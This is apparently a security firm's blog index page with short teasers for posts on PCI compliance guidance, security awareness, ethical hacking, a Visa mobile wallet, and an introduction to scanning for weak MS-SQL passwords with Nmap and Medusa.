Blog
Insights for Reasonable Cyber Security and Compliance
What’s happening in the world of cybersecurity? How do you define 'reasonable' security controls? Which cyber threats can be prevented? What steps should you take to make your systems safer? Read our blog posts to gain new insights into cybersecurity news, security awareness, the latest threats and risks, penetration testing, compliance, regulations and so much more.
PCI Council Releases New Guidance for Virtualization
The PCI Security Standards Council recently released new supplemental guidance (PDF) regarding PCI compliance considerations for the use of virtualization technologies. (more…)
Free Intro to PCI Training Available
In case you weren’t able to attend today’s webinar, Introduction to the Payment Card Industry Data Security Standard, we’ve posted a recording of the entire session on Halock’s YouTube channel.
The full 6-part series is embedded below for your convenience. (more…)
National Vulnerability Database (NVD) National Checklist Program Repository
National Vulnerability Database (NVD) National Checklist Program Repository. While working with our clients to establish appropriate system hardening standards for PCI compliance, we are often asked to provide resources and guidance that can be referenced as additional system and operating system types are deployed. The following NIST resource can be most helpful in this regard. (more…)
Information Security Awareness Becoming More Mainstream?
Information Security Awareness – This morning on CNN, there was about five minutes spent talking about things like cloud security, the recent Sony and Lockheed Martin breaches, and the increased need to be aware of where our sensitive data is stored and how it’s being protected. (more…)
Why We Need Ethical Hacking
There is often confusion with the difference between “vulnerability scanning” and “penetration testing“, the latter being synonymous with “ethical hacking”. This article/podcast, from the president of the EC Council, the accreditation body for the Certified Ethical Hacker designation, includes a nice explanation of this very important kind of security testing. (more…)
PCI DSS Quick Reference Guide v2.0 Released
The PCI Security Standards Council has released the new PCI DSS Quick Reference Guide, updated for the new version 2.0 of the Payment Card Industry Data Security Standard (PCI DSS). (more…)
Visa to Launch Mobile Wallet in U.S. this Fall
Visa has announced plans to launch a mobile wallet using NFC (“Near Field Communications”) to facilitate mobile payments. See the detailed announcement from Computerworld here: (more…)
Scanning for Weak MS-SQL Passwords Using NMap and Medusa
Before proceeding, please note that there are many tools and methods that have the ability to scan for weak or blank MS-SQL passwords. SQLPing comes to mind which is a great tool if you’re on a Windows host. Metasploit has the ability to scan for MS-SQL passwords as well but it isn’t ideal for targeted lists and it can take time trying to connect to hosts that don’t have SQL installed. I could probably write a few extra pages just about tools and methods so I’ll stop there and get started. (more…)